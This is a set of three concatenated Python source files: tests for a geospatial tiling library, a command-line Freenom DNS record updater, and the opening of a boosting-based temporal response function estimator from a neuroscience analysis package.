"wkt": 'PROJCS["WGS 84 / UTM zone 15N",GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]],PROJECTION["Transverse_Mercator"],PARAMETER["latitude_of_origin",0],PARAMETER["central_meridian",-93],PARAMETER["scale_factor",0.9996],PARAMETER["false_easting",500000],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH],AUTHORITY["EPSG","32615"]]', # noqa
"zone": 15,
},
"type": "Feature",
}
@mock.patch("descarteslabs.scenes.geocontext.Raster")
def test_from_key(self, mock_raster):
mock_raster_instance = mock_raster.return_value
mock_raster_instance.dltile.return_value = self.dltile_dict
tile = geocontext.DLTile.from_key(self.key)
mock_raster_instance.dltile.assert_called_with(self.key)
assert tile.key == self.key
assert tile.resolution == 960
assert tile.pad == 16
assert tile.tilesize == 128
assert tile.crs == "EPSG:32615"
assert tile.bounds == (361760.0, 4531200.0, 515360.0, 4684800.0)
assert tile.bounds_crs == "EPSG:32615"
assert tile.raster_params == {"dltile": self.key, "align_pixels": False}
assert tile.geotrans == (361760.0, 960, 0, 4684800.0, 0, -960)
assert tile.proj4 == "+proj=utm +zone=15 +datum=WGS84 +units=m +no_defs "
assert (
tile.wkt
== 'PROJCS["WGS 84 / UTM zone 15N",GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]],PROJECTION["Transverse_Mercator"],PARAMETER["latitude_of_origin",0],PARAMETER["central_meridian",-93],PARAMETER["scale_factor",0.9996],PARAMETER["false_easting",500000],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH],AUTHORITY["EPSG","32615"]]' # noqa
)
@mock.patch("descarteslabs.scenes.geocontext.Raster")
def test_assign(self, mock_raster):
mock_raster_instance = mock_raster.return_value
mock_raster_instance.dltile.return_value = self.dltile_dict
tile = geocontext.DLTile.from_key(self.key)
mock_raster_instance.dltile.assert_called_with(self.key)
mock_raster_instance.dltile.return_value = self.dltile2_dict
tile = tile.assign(8)
mock_raster_instance.dltile.assert_called_with(self.key2)
assert tile.key == self.key2
assert tile.resolution == 960
assert tile.pad == 8
assert tile.tilesize == 128
assert tile.crs == "EPSG:32615"
assert tile.bounds == (369440.0, 4538880.0, 507680.0, 4677120.0)
assert tile.bounds_crs == "EPSG:32615"
assert tile.raster_params == {"dltile": self.key2, "align_pixels": False}
assert tile.geotrans == (369440.0, 960.0, 0, 4677120.0, 0, -960.0)
assert tile.proj4 == "+proj=utm +zone=15 +datum=WGS84 +units=m +no_defs "
assert (
tile.wkt
== 'PROJCS["WGS 84 / UTM zone 15N",GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]],PROJECTION["Transverse_Mercator"],PARAMETER["latitude_of_origin",0],PARAMETER["central_meridian",-93],PARAMETER["scale_factor",0.9996],PARAMETER["false_easting",500000],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH],AUTHORITY["EPSG","32615"]]' # noqa
)
class TestXYZTile(unittest.TestCase):
def test_bounds(self):
tile = geocontext.XYZTile(1, 1, 2)
assert tile.bounds == (-10018754.171394622, 0.0, 0.0, 10018754.171394622)
def test_geometry(self):
tile = geocontext.XYZTile(1, 1, 2)
assert tile.geometry.bounds == (-90.0, 0.0, 0.0, 66.51326044311186)
def test_resolution(self):
tile = geocontext.XYZTile(1, 1, 0)
assert tile.resolution == geocontext.EARTH_CIRCUMFERENCE_WGS84 / tile.tilesize
        # resolution at zoom 0 is just the Earth's circumference divided by tilesize
assert geocontext.XYZTile(1, 1, 2).resolution == (
geocontext.XYZTile(1, 1, 3).resolution * 2
)
# resolution halves with each zoom level
assert (
geocontext.XYZTile(1, 1, 12).resolution
== geocontext.XYZTile(2048, 1024, 12).resolution
)
# resolution is invariant to location; only depends on zoom
def test_raster_params(self):
tile = geocontext.XYZTile(1, 1, 2)
assert tile.raster_params == {
"bounds": (-10018754.171394622, 0.0, 0.0, 10018754.171394622),
"srs": "EPSG:3857",
"bounds_srs": "EPSG:3857",
"align_pixels": False,
"resolution": 39135.75848201024,
}
def test_children_parent(self):
tile = geocontext.XYZTile(1, 1, 2)
assert tile == tile.children()[0].parent()
# can't use the word `test` in the function name otherwise nose tries to run it...
def run_threadsafe_experiment(geoctx_factory, property, n=80000):
"In a subprocess, test whether parallel access to a property on a GeoContext fails (due to Shapely thread-unsafety)"
conn_ours, conn_theirs = multiprocessing.Pipe(duplex=False)
# Run actual test in a separate process, because unsafe use of Shapely objects
# across threads can occasionally cause segfaults, so we want to check the exit
# code of the process doing the testing.
def threadsafe_test(geoctx_factory, property, conn, n):
ctx = geoctx_factory()
with concurrent.futures.ThreadPoolExecutor(
max_workers=multiprocessing.cpu_count()
) as executor:
futures = [
executor.submit(lambda: getattr(ctx, property)) for i in range(n)
]
errors = []
for future in concurrent.futures.as_completed(futures):
if future.exception() is not None:
errors.append("exception: {}".format(future.exception()))
conn.send(errors)
p = multiprocessing.Process(
target=threadsafe_test, args=(geoctx_factory, property, conn_theirs, n)
)
p.start()
p.join()
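    # a negative exitcode means the subprocess was killed by a signal (e.g. a segfault)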
if p.exitcode < 0:
errors = ["failed with exit code {}".format(p.exitcode)]
else:
errors = conn_ours.recv()
return errors
@unittest.skip(
"Slow test. Un-skip this and run manually if touching any code related to `_geometry_lock_`!"
)
class TestShapelyThreadSafe(unittest.TestCase):
@staticmethod
def aoi_factory():
return geocontext.AOI(
{
"coordinates": [
[
[-93.52300099792355, 41.241436141055345],
[-93.7138666, 40.703737],
[-94.37053769704536, 40.83098709945576],
[-94.2036617, 41.3717716],
[-93.52300099792355, 41.241436141055345],
]
],
"type": "Polygon",
},
crs="EPSG:3857",
resolution=10,
)
@staticmethod
def dltile_factory():
return geocontext.DLTile(
{
"geometry": {
"coordinates": [
[
[-94.64171754779824, 40.9202359006794],
[-92.81755164322226, 40.93177944075989],
[-92.81360932958779, 42.31528732533928],
[-94.6771717075502, 42.303172487087394],
[-94.64171754779824, 40.9202359006794],
]
],
"type": "Polygon",
},
"properties": {
"cs_code": "EPSG:32615",
"key": "128:16:960.0:15:-1:37",
"outputBounds": [361760.0, 4531200.0, 515360.0, 4684800.0],
"pad": 16,
"resolution": 960.0,
"ti": -1,
"tilesize": 128,
"tj": 37,
"zone": 15,
"geotrans": [361760.0, 960.0, 0, 4684800.0, 0, -960.0],
"proj4": "+proj=utm +zone=15 +datum=WGS84 +units=m +no_defs ",
"wkt": 'PROJCS["WGS 84 / UTM zone 15N",GEOGCS["WGS 84",DATUM["WGS_1984",SPHEROID["WGS 84",6378137,298.257223563,AUTHORITY["EPSG","7030"]],AUTHORITY["EPSG","6326"]],PRIMEM["Greenwich",0,AUTHORITY["EPSG","8901"]],UNIT["degree",0.0174532925199433,AUTHORITY["EPSG","9122"]],AUTHORITY["EPSG","4326"]],PROJECTION["Transverse_Mercator"],PARAMETER["latitude_of_origin",0],PARAMETER["central_meridian",-93],PARAMETER["scale_factor",0.9996],PARAMETER["false_easting",500000],PARAMETER["false_northing",0],UNIT["metre",1,AUTHORITY["EPSG","9001"]],AXIS["Easting",EAST],AXIS["Northing",NORTH],AUTHORITY["EPSG","32615"]]', # noqa
},
"type": "Feature",
}
)
def test_aoi_raster_params_threadsafe(self):
errors = run_threadsafe_experiment(self.aoi_factory, "raster_params")
assert errors == []
def test_aoi_geo_interface_threadsafe(self):
errors = run_threadsafe_experiment(self.aoi_factory, "__geo_interface__")
assert errors == []
def test_dltile_geo_interface_threadsafe(self):
errors = run_threadsafe_experiment(self.dltile_factory, "__geo_interface__")
assert errors == []
|
fdu.py
|
#!/usr/bin/env python
import datetime
import json
import pathlib
import platform
import pprint
import sys
import time
import traceback
from multiprocessing import Process
import click
import requests
import six
import yaml
import freenom_dns_updater
from freenom_dns_updater.get_my_ip import *
is_windows = any(platform.win32_ver())
if six.PY2:
    from urlparse import urlparse
else:
    from urllib.parse import urlparse
_format_map = {
None: lambda x: x,
'TEXT': lambda x: pprint.pformat(x),
'JSON': lambda x: json.dumps(x, sort_keys=True),
'YAML': lambda x: yaml.safe_dump(x)
}
def format_data(data, formatter='TEXT'):
if isinstance(data, (list, tuple, set)):
data = [format_data(x, None) for x in data]
elif isinstance(data, dict):
data = {format_data(k, None): format_data(v, None) for k, v in six.iteritems(data)}
elif isinstance(data, freenom_dns_updater.Domain):
data = format_data({'name': data.name, 'state': data.state,
'type': data.type, 'id': data.id,
'register': data.register_date,
'expire': data.expire_date}, None)
elif isinstance(data, freenom_dns_updater.Record):
data = format_data({'name': data.name, 'type': data.type.name,
'ttl': data.ttl, 'target': data.target}, None)
elif isinstance(data, datetime.date):
data = str(data)
    return _format_map[formatter](data)
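# e.g. format_data({'a': 1}, 'JSON') -> '{"a": 1}'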
click_record_type = click.Choice([t.name for t in freenom_dns_updater.RecordType])
@click.group()
@click.version_option('1.0')
@click.help_option('--help', '-h')
def cli():
pass
@cli.group(help='''Manage records''')
@click.help_option('--help', '-h')
def record():
pass
@cli.group(help='''Manage domain''')
@click.help_option('--help', '-h')
def domain():
pass
@record.command('ls', help='List records of a specified domain')
@click.argument('user')
@click.argument('password')
@click.argument('domain')
@click.option('-f', '--format', help='Output format', default='TEXT', type=click.Choice(("TEXT", "JSON", "YAML")))
@click.help_option('--help', '-h')
def record_ls(user, password, domain, format):
freenom = freenom_dns_updater.Freenom()
if not freenom.login(user, password):
        click.secho('Unable to log in with the given credentials', fg='red', bold=True)
sys.exit(6)
# search the domain
for d in freenom.list_domains():
if d.name == domain:
domain = d
break
if not isinstance(domain, freenom_dns_updater.Domain):
click.secho("You don't own the domain \"{}\"".format(domain), fg='yellow', bold=True)
sys.exit(7)
records = freenom.list_records(domain)
click.echo(format_data(records, format))
@record.command('add', help='Add a record into a specified domain')
@click.argument('user')
@click.argument('password')
@click.argument('domain')
@click.option('-n', '--name', help='Record name. Used as subdomain in A records')
@click.option('-t', '--type', help='Record type. A or AAAA for instance', type=click_record_type)
@click.option('-a', '--target', help='Record target. An ip address for A record')
@click.option('-l', '--ttl', help='Record time to live.', type=click.INT)
@click.option('-u', '--update', help='Update existing record', default=True, type=click.BOOL)
@click.help_option('--help', '-h')
def record_add(user, password, domain, name, type, target, ttl, update):
d = {'login': user, 'password': password, 'record': []}
record = {'domain': domain}
if name:
record['name'] = name
if type:
record['type'] = type
if target:
record['target'] = target
if ttl:
record['ttl'] = ttl
d['record'].append(record)
config = freenom_dns_updater.Config(d)
ok_count, err_count = record_action(lambda freenom, rec: freenom.add_record(rec, update), config, False)
if ok_count:
click.echo('Record successfully added{}.'.format("/updated" if update else ""))
else:
click.secho('No record updated', fg='yellow', bold=True)
@record.command('update', help='Update a record')
@click.argument('user')
@click.argument('password')
@click.argument('domain')
@click.option('-n', '--name', help='Record name. Used as subdomain in A records')
@click.option('-t', '--type', help='Record type. A or AAAA for instance', type=click_record_type)
@click.option('-a', '--target', help='Record target. An ip address for A records')
@click.option('-l', '--ttl', help='Record time to live.', type=click.INT)
@click.help_option('--help', '-h')
def record_update(user, password, domain, name, type, target, ttl):
d = {'login': user, 'password': password, 'record': []}
record = {'domain': domain}
if name:
record['name'] = name
if type:
record['type'] = type
if target:
record['target'] = target
if ttl:
record['ttl'] = ttl
d['record'].append(record)
config = freenom_dns_updater.Config(d)
ok_count, err_count = record_action(lambda freenom, rec: freenom.add_record(rec, True), config, False)
if ok_count:
click.echo('Record successfully added/updated.')
else:
click.secho('No record updated', fg='yellow', bold=True)
@record.command('rm', help='Remove a record from a specified domain')
@click.argument('user')
@click.argument('password')
@click.argument('domain')
@click.option('-n', '--name', help='Record name. Used as subdomain in A records')
@click.option('-t', '--type', help='Record type. A or AAAA for instance', type=click_record_type)
@click.option('-a', '--target', help='Record target. An ip address for A record')
@click.option('-l', '--ttl', help='Record time to live.', type=click.INT)
@click.option('-u', '--update', help='Update existing record', default=True, type=click.BOOL)
@click.help_option('--help', '-h')
def record_rm(user, password, domain, name, type, target, ttl, update):
d = {'login': user, 'password': password, 'record': []}
record = {'domain': domain}
if name:
record['name'] = name
if type:
record['type'] = type
if target:
record['target'] = target
if ttl:
record['ttl'] = ttl
d['record'].append(record)
config = freenom_dns_updater.Config(d)
ok_count, err_count = record_action(lambda freenom, rec: freenom.remove_record(rec), config, False)
if ok_count:
click.echo('Record successfully removed.')
else:
click.secho('No record removed', fg='yellow', bold=True)
def _update(config, ignore_errors):
config = freenom_dns_updater.Config(config_src(config))
ok_count, err_count = record_action(lambda freenom, rec: freenom.add_record(rec, True), config, ignore_errors)
if ok_count:
if not err_count:
click.echo('Successfully Updated {} record{}'.format(ok_count, "s" if ok_count > 1 else ""))
else:
click.echo('Updated {} record{}'.format(ok_count, "s" if ok_count > 1 else ""))
else:
click.secho('No record updated', fg='yellow', bold=True)
def config_src(config):
url = urlparse(config)
if url.scheme in ('file', 'http', 'https'):
ret = requests.get(config, stream=True).raw
    else:  # expect a file path
ret = pathlib.Path(config)
if not ret.is_file():
click.secho('File "{}" not found.'.format(ret), fg='red', bold=True)
sys.exit(5)
return ret
@cli.command('update', help='''Update records according to a configuration file''')
@click.argument('config', default='freenom.yml')
@click.option('-i', '--ignore-errors', default=False, help='ignore errors when updating', is_flag=True)
@click.help_option('--help', '-h')
def update(config, ignore_errors):
return _update(config, ignore_errors)
def record_action(action, config, ignore_errors):
records = config.records
if not records:
click.secho('There is no record configured', fg='yellow', bold=True)
freenom = freenom_dns_updater.Freenom()
if not freenom.login(config.login, config.password):
        click.secho('Unable to log in with the given credentials', fg='red', bold=True)
sys.exit(6)
domains = freenom.list_domains()
domains_mapping = {d.name: d for d in domains}
ok_count = 0
err_count = 0
for rec in records:
domain_name = rec.domain.name
rec.domain = domains_mapping.get(domain_name)
if rec.domain is None:
click.secho("You don't own the domain \"{}\"".format(domain_name), fg='yellow', bold=True)
if ignore_errors:
continue
else:
sys.exit(7)
try:
action(freenom, rec)
except Exception as e:
if not ignore_errors:
raise
# TODO log e
err_count += 1
else:
ok_count += 1
return ok_count, err_count
@domain.command('ls', help='List domains')
@click.argument('user')
@click.argument('password')
@click.option('-f', '--format', help='Output format', default='TEXT', type=click.Choice(("TEXT", "JSON", "YAML")))
@click.help_option('--help', '-h')
def domain_ls(user, password, format):
freenom = freenom_dns_updater.Freenom()
if not freenom.login(user, password):
        click.secho('Unable to log in with the given credentials', fg='red', bold=True)
sys.exit(6)
# search the domain
domains = freenom.list_domains()
click.echo(format_data(domains, format))
@cli.command(help='''Regularly update records according to a configuration file''')
@click.argument('config', default='freenom.yml' if is_windows else '/etc/freenom.yml')
@click.option('-t', '--period', default=60 * 60, help='update period in seconds', type=click.IntRange(10, 2592000))
@click.option('-i', '--ignore-errors', help='ignore errors when updating', is_flag=True)
@click.option('-c', '--cache', help='cache ip and update only if there is any changes', is_flag=True)
@click.help_option('--help', '-h')
def process(config, period, ignore_errors, cache):
config_src(config)
ipv4 = ''
ipv6 = ''
while 1:
try:
new_ipv4 = ''
new_ipv6 = ''
update_needed = True
if cache:
try:
new_ipv4 = str(get_my_ipv4())
except:
pass
try:
new_ipv6 = str(get_my_ipv6())
except:
pass
update_needed = ipv4 != new_ipv4 or ipv6 != new_ipv6
if update_needed:
p = Process(target=_update, args=(config, ignore_errors))
p.start()
p.join(500)
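                # give the update subprocess at most 500 seconds before the loop moves on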
if cache:
ipv4 = new_ipv4
ipv6 = new_ipv6
except:
traceback.print_exc(file=sys.stderr)
finally:
time.sleep(period)
if __name__ == '__main__':
cli()
|
_boosting.py
|
"""
Boosting as described by David et al. (2007).
Versions
--------
7: Accept segmented data, respect segmentation (don't concatenate data)
Profiling
---------
ds = datasets._get_continuous()
y = ds['y']
x1 = ds['x1']
x2 = ds['x2']
%prun -s cumulative res = boosting(y, x1, 0, 1)
"""
import inspect
from itertools import product
from multiprocessing import Process, Queue
from multiprocessing.sharedctypes import RawArray
import os
import time
from threading import Event, Thread
import numpy as np
from numpy import newaxis
from scipy.linalg import norm
import scipy.signal
from scipy.stats import spearmanr
from tqdm import tqdm
from .._config import CONFIG
from .._data_obj import NDVar
from .._utils import LazyProperty, user_activity
from ._boosting_opt import l1, l2, generate_options, update_error
from .shared import RevCorrData
# BoostingResult version
VERSION = 9
# process messages
JOB_TERMINATE = -1
# error functions
ERROR_FUNC = {'l2': l2, 'l1': l1}
DELTA_ERROR_FUNC = {'l2': 2, 'l1': 1}
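# integer codes passed to generate_options() to select the error variant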
class BoostingResult:
"""Result from boosting a temporal response function
Attributes
----------
h : NDVar | tuple of NDVar
The temporal response function. Whether ``h`` is an NDVar or a tuple of
NDVars depends on whether the ``x`` parameter to :func:`boosting` was
an NDVar or a sequence of NDVars.
h_scaled : NDVar | tuple of NDVar
``h`` scaled such that it applies to the original input ``y`` and ``x``.
If boosting was done with ``scale_data=False``, ``h_scaled`` is the same
as ``h``.
h_source : NDVar | tuple of NDVar
If ``h`` was constructed using a basis, ``h_source`` represents the
source of ``h`` before being convolved with the basis.
h_time : UTS
Time dimension of the kernel.
r : float | NDVar
Correlation between the measured response and the response predicted
with ``h``. Type depends on the ``y`` parameter to :func:`boosting`.
spearmanr : float | NDVar
As ``r``, the Spearman rank correlation.
t_run : float
Time it took to run the boosting algorithm (in seconds).
error : str
The error evaluation method used.
residual : float | NDVar
The fit error, i.e. the result of the ``error`` error function on the
final fit.
delta : scalar
Kernel modification step used.
mindelta : None | scalar
Mindelta parameter used.
scale_data : bool
Scale_data parameter used.
y_mean : NDVar | scalar
Mean that was subtracted from ``y``.
y_scale : NDVar | scalar
Scale by which ``y`` was divided.
x_mean : NDVar | scalar | tuple
Mean that was subtracted from ``x``.
x_scale : NDVar | scalar | tuple
Scale by which ``x`` was divided.
partitions : int
Numbers of partitions of the data used for cross validation.
"""
def __init__(
self,
# input parameters
y, x, tstart, tstop, scale_data, delta, mindelta, error,
basis, basis_window, partitions_arg, partitions, model,
# result parameters
h, r, isnan, spearmanr, residual, t_run,
y_mean, y_scale, x_mean, x_scale, y_info={}, r_l1=None,
# new parameters
selective_stopping=0,
**debug_attrs,
):
# input parameters
self.y = y
self.x = x
self.tstart = tstart
self.tstop = tstop
self.scale_data = scale_data
self.delta = delta
self.mindelta = mindelta
self.error = error
self._partitions_arg = partitions_arg
self.partitions = partitions
self.model = model
self.basis = basis
self.basis_window = basis_window
self.selective_stopping = selective_stopping
# results
self._h = h
self._y_info = y_info
self.r = r
self.r_l1 = r_l1
self._isnan = isnan
self.spearmanr = spearmanr
self.residual = residual
self.t_run = t_run
self.y_mean = y_mean
self.y_scale = y_scale
self.x_mean = x_mean
self.x_scale = x_scale
self._debug_attrs = debug_attrs
for k, v in debug_attrs.items():
setattr(self, k, v)
def __getstate__(self):
return {
# input parameters
'y': self.y, 'x': self.x, 'tstart': self.tstart, 'tstop': self.tstop,
'scale_data': self.scale_data, 'delta': self.delta,
'mindelta': self.mindelta, 'error': self.error,
'partitions_arg': self._partitions_arg, 'partitions': self.partitions,
'model': self.model, 'basis': self.basis,
'basis_window': self.basis_window,
'selective_stopping': self.selective_stopping,
# results
'h': self._h, 'r': self.r, 'r_l1': self.r_l1, 'isnan': self._isnan,
'spearmanr': self.spearmanr, 'residual': self.residual,
't_run': self.t_run, 'version': VERSION,
'y_mean': self.y_mean, 'y_scale': self.y_scale,
'x_mean': self.x_mean, 'x_scale': self.x_scale,
'y_info': self._y_info,
**self._debug_attrs,
}
def __setstate__(self, state):
if state['version'] < 7:
state.update(partitions=None, partitions_arg=None, model=None, basis=0, basis_window='hamming')
elif state['version'] < 8:
state['partitions'] = state.pop('n_partitions')
state['partitions_arg'] = state.pop('n_partitions_arg')
if state['version'] < 9:
state['residual'] = state.pop('fit_error')
self.__init__(**state)
def __repr__(self):
if self.x is None or isinstance(self.x, str):
x = self.x
else:
x = ' + '.join(map(str, self.x))
items = [
'boosting %s ~ %s' % (self.y, x),
'%g - %g' % (self.tstart, self.tstop),
]
for name, param in inspect.signature(boosting).parameters.items():
if param.default is inspect.Signature.empty or name == 'ds':
continue
elif name == 'debug':
continue
elif name == 'partitions':
value = self._partitions_arg
else:
value = getattr(self, name)
if value != param.default:
items.append(f'{name}={value}')
return f"<{', '.join(items)}>"
@LazyProperty
def h(self):
if not self.basis:
return self._h
elif isinstance(self._h, tuple):
return tuple(h.smooth('time', self.basis, self.basis_window, 'full') for h in self._h)
else:
return self._h.smooth('time', self.basis, self.basis_window, 'full')
@LazyProperty
def h_scaled(self):
if self.y_scale is None:
return self.h
elif isinstance(self.h, NDVar):
out = self.h * (self.y_scale / self.x_scale)
out.info = self._y_info.copy()
return out
else:
out = []
for h, sx in zip(self.h, self.x_scale):
h = h * (self.y_scale / sx)
h.info = self._y_info.copy()
out.append(h)
return tuple(out)
@LazyProperty
def h_source(self):
if self.basis:
return self._h
else:
return None
@LazyProperty
def h_time(self):
if isinstance(self.h, NDVar):
return self.h.time
else:
return self.h[0].time
def _set_parc(self, parc):
"""Change the parcellation of source-space result
Notes
-----
No warning for missing sources!
"""
from .._ndvar import set_parc
if not self.r.has_dim('source'):
raise RuntimeError('BoostingResult does not have source-space data')
def sub_func(obj):
if obj is None:
return None
elif isinstance(obj, tuple):
return tuple(sub_func(obj_) for obj_ in obj)
obj_new = set_parc(obj, parc)
index = np.invert(obj_new.source.parc.startswith('unknown-'))
return obj_new.sub(source=index)
for attr in ('h', 'r', 'spearmanr', 'residual', 'y_mean', 'y_scale'):
setattr(self, attr, sub_func(getattr(self, attr)))
@user_activity
def boosting(y, x, tstart, tstop, scale_data=True, delta=0.005, mindelta=None,
error='l2', basis=0, basis_window='hamming',
partitions=None, model=None, ds=None, selective_stopping=0,
debug=False):
"""Estimate a filter with boosting
Parameters
----------
y : NDVar
Signal to predict.
x : NDVar | sequence of NDVar
Signal to use to predict ``y``. Can be sequence of NDVars to include
multiple predictors. Time dimension must correspond to ``y``.
tstart : float
Start of the TRF in seconds.
tstop : float
Stop of the TRF in seconds.
scale_data : bool | 'inplace'
Scale ``y`` and ``x`` before boosting: subtract the mean and divide by
the standard deviation (when ``error='l2'``) or the mean absolute
value (when ``error='l1'``). With ``scale_data=True`` (default) the
original ``y`` and ``x`` are left untouched; use ``'inplace'`` to save
memory by scaling the original ``y`` and ``x``.
delta : scalar
Step for changes in the kernel.
mindelta : scalar
If the error for the training data can't be reduced, divide ``delta``
in half until ``delta < mindelta``. The default is ``mindelta = delta``,
i.e. ``delta`` is constant.
error : 'l2' | 'l1'
Error function to use (default is ``l2``).
basis : float
Use a basis of windows with this length for the kernel (by default,
impulses are used).
basis_window : str | float | tuple
Basis window (see :func:`scipy.signal.get_window` for options; default
is ``'hamming'``).
partitions : int
Divide the data into this many ``partitions`` for cross-validation-based
early stopping. In each partition, ``n - 1`` segments are used for
training, and the remaining segment is used for validation.
If data is continuous, data are divided into contiguous segments of
equal length (default 10).
If data has cases, cases are divided with ``[::partitions]`` slices
(default ``min(n_cases, 10)``; if ``model`` is specified, ``n_cases``
is the lowest number of cases in any cell of the model).
model : Categorial
If data has cases, divide cases into different categories (division
for crossvalidation is done separately for each cell).
ds : Dataset
If provided, other parameters can be specified as string for items in
``ds``.
selective_stopping : int
By default, the boosting algorithm stops when the testing error stops
decreasing. With ``selective_stopping=True``, boosting continues but
excludes the predictor (one time-series in ``x``) that caused the
increase in testing error, and continues until all predictors are
stopped. The integer value of ``selective_stopping`` determines after
how many steps with error increases each predictor is excluded.
debug : bool
Store additional properties in the result object (increases memory
consumption).
Returns
-------
result : BoostingResult
Object containing results from the boosting estimation (see
:class:`BoostingResult`).
Notes
-----
In order to predict data, use the :func:`convolve` function::
>>> ds = datasets.get_uts()
>>> ds['a1'] = epoch_impulse_predictor('uts', 'A=="a1"', ds=ds)
>>> ds['a0'] = epoch_impulse_predictor('uts', 'A=="a0"', ds=ds)
>>> res = boosting('uts', ['a0', 'a1'], 0, 0.5, partitions=10, model='A', ds=ds)
>>> y_pred = convolve(res.h_scaled, ['a0', 'a1'], ds=ds)
The boosting algorithm is described in [1]_.
References
----------
.. [1] David, S. V., Mesgarani, N., & Shamma, S. A. (2007). Estimating
sparse spectro-temporal receptive fields with natural stimuli. Network:
Computation in Neural Systems, 18(3), 191-212.
`10.1080/09548980701609235 <https://doi.org/10.1080/09548980701609235>`_.
"""
# check arguments
mindelta_ = delta if mindelta is None else mindelta
selective_stopping = int(selective_stopping)
if selective_stopping < 0:
raise ValueError(f"selective_stopping={selective_stopping}")
data = RevCorrData(y, x, error, scale_data, ds)
data.initialize_cross_validation(partitions, model, ds)
n_y = len(data.y)
n_x = len(data.x)
# TRF extent in indices
tstep = data.time.tstep
i_start = int(round(tstart / tstep))
i_stop = int(round(tstop / tstep))
trf_length = i_stop - i_start
if data.segments is None:
i_skip = trf_length - 1
else:
i_skip = 0
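    # with continuous (unsegmented) data, the first trf_length - 1 predicted samples
    # precede full kernel overlap and are skipped when evaluating the fit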
if basis:
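        # smooth each predictor with a normalized window; each boosting impulse then
        # effectively stands for one basis window (cf. BoostingResult.h)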
n = int(round(basis / data.time.tstep))
w = scipy.signal.get_window(basis_window, n, False)
w /= w.sum()
for xi in data.x:
xi[:] = scipy.signal.convolve(xi, w, 'same')
# progress bar
n_cv = len(data.cv_segments)
pbar = tqdm(desc=f"Boosting{f' {n_y} signals' if n_y > 1 else ''}", total=n_y * n_cv, disable=CONFIG['tqdm'])
t_start = time.time()
# result containers
res = np.empty((3, n_y)) # r, rank-r, error
h_x = np.empty((n_y, n_x, trf_length))
store_y_pred = bool(data.vector_dim) or debug
y_pred = np.empty_like(data.y) if store_y_pred else np.empty(data.y.shape[1:])
# boosting
if CONFIG['n_workers']:
# Make sure cross-validations are added in the same order, otherwise
# slight numerical differences can occur
job_queue, result_queue = setup_workers(data, i_start, trf_length, delta, mindelta_, error, selective_stopping)
stop_jobs = Event()
thread = Thread(target=put_jobs, args=(job_queue, n_y, n_cv, stop_jobs))
thread.start()
# collect results
try:
h_segs = {}
for _ in range(n_y * n_cv):
y_i, seg_i, h = result_queue.get()
pbar.update()
if y_i in h_segs:
h_seg = h_segs[y_i]
h_seg[seg_i] = h
if len(h_seg) == n_cv:
del h_segs[y_i]
hs = [h for h in (h_seg[i] for i in range(n_cv)) if h is not None]
if hs:
h = np.mean(hs, 0, out=h_x[y_i])
y_i_pred = y_pred[y_i] if store_y_pred else y_pred
convolve(h, data.x, data.x_pads, i_start, data.segments, y_i_pred)
if not data.vector_dim:
res[:, y_i] = evaluate_kernel(data.y[y_i], y_i_pred, error, i_skip, data.segments)
else:
h_x[y_i] = 0
if not data.vector_dim:
res[:, y_i] = 0
if store_y_pred:
y_pred[y_i] = 0
else:
h_segs[y_i] = {seg_i: h}
except KeyboardInterrupt:
stop_jobs.set()
raise
else:
for y_i, y_ in enumerate(data.y):
hs = []
for segments, train, test in data.cv_segments:
h = boost(y_, data.x, data.x_pads, segments, train, test, i_start, trf_length, delta, mindelta_, error, selective_stopping)
if h is not None:
hs.append(h)
pbar.update()
if hs:
h = np.mean(hs, 0, out=h_x[y_i])
y_i_pred = y_pred[y_i] if store_y_pred else y_pred
convolve(h, data.x, data.x_pads, i_start, data.segments, y_i_pred)
if not data.vector_dim:
res[:, y_i] = evaluate_kernel(data.y[y_i], y_i_pred, error, i_skip, data.segments)
else:
h_x[y_i] = 0
if not data.vector_dim:
res[:, y_i] = 0
if store_y_pred:
y_pred[y_i] = 0
pbar.close()
t_run = time.time() - t_start
# fit-evaluation statistics
if data.vector_dim:
y_vector = data.y.reshape(data.vector_shape)
y_pred_vector = y_pred.reshape(data.vector_shape)
# error: distance between actual and modeled
y_pred_error = norm(y_vector - y_pred_vector, axis=1)
if error == 'l1':
errs = y_pred_error.mean(-1)
elif error == 'l2':
errs = y_pred_error.std(-1)
else:
raise RuntimeError(f"error={error!r}")
rs, rs_l1 = data.vector_correlation(y_vector, y_pred_vector)
if rs_l1 is None:
r_l1 = None
else:
r_l1 = data.package_value(rs_l1, 'l1 correlation', meas='r')
spearmanr = None
else:
rs, rrs, errs = res
r_l1 = None
spearmanr = data.package_value(rrs, 'rank correlation', meas='r')
isnan = np.isnan(rs)
rs[isnan] = 0
r = data.package_value(rs, 'correlation', meas='r')
residual = data.package_value(errs, 'fit error')
y_mean, y_scale, x_mean, x_scale = data.data_scale_ndvars()
if debug:
debug_attrs = {
'y_pred': data.package_y_like(y_pred, 'y-pred'),
}
else:
debug_attrs = {}
h = data.package_kernel(h_x, tstart)
model_repr = None if model is None else data.model
return BoostingResult(
# input parameters
data.y_name, data.x_name, tstart, tstop, scale_data, delta, mindelta, error,
basis, basis_window, partitions, data.partitions, model_repr,
# result parameters
h, r, isnan, spearmanr, residual, t_run,
y_mean, y_scale, x_mean, x_scale, data.y_info,
# vector results
r_l1, selective_stopping,
**debug_attrs)
class BoostingStep:
__slots__ = ('i_stim', 'i_time', 'delta', 'e_train', 'e_test')
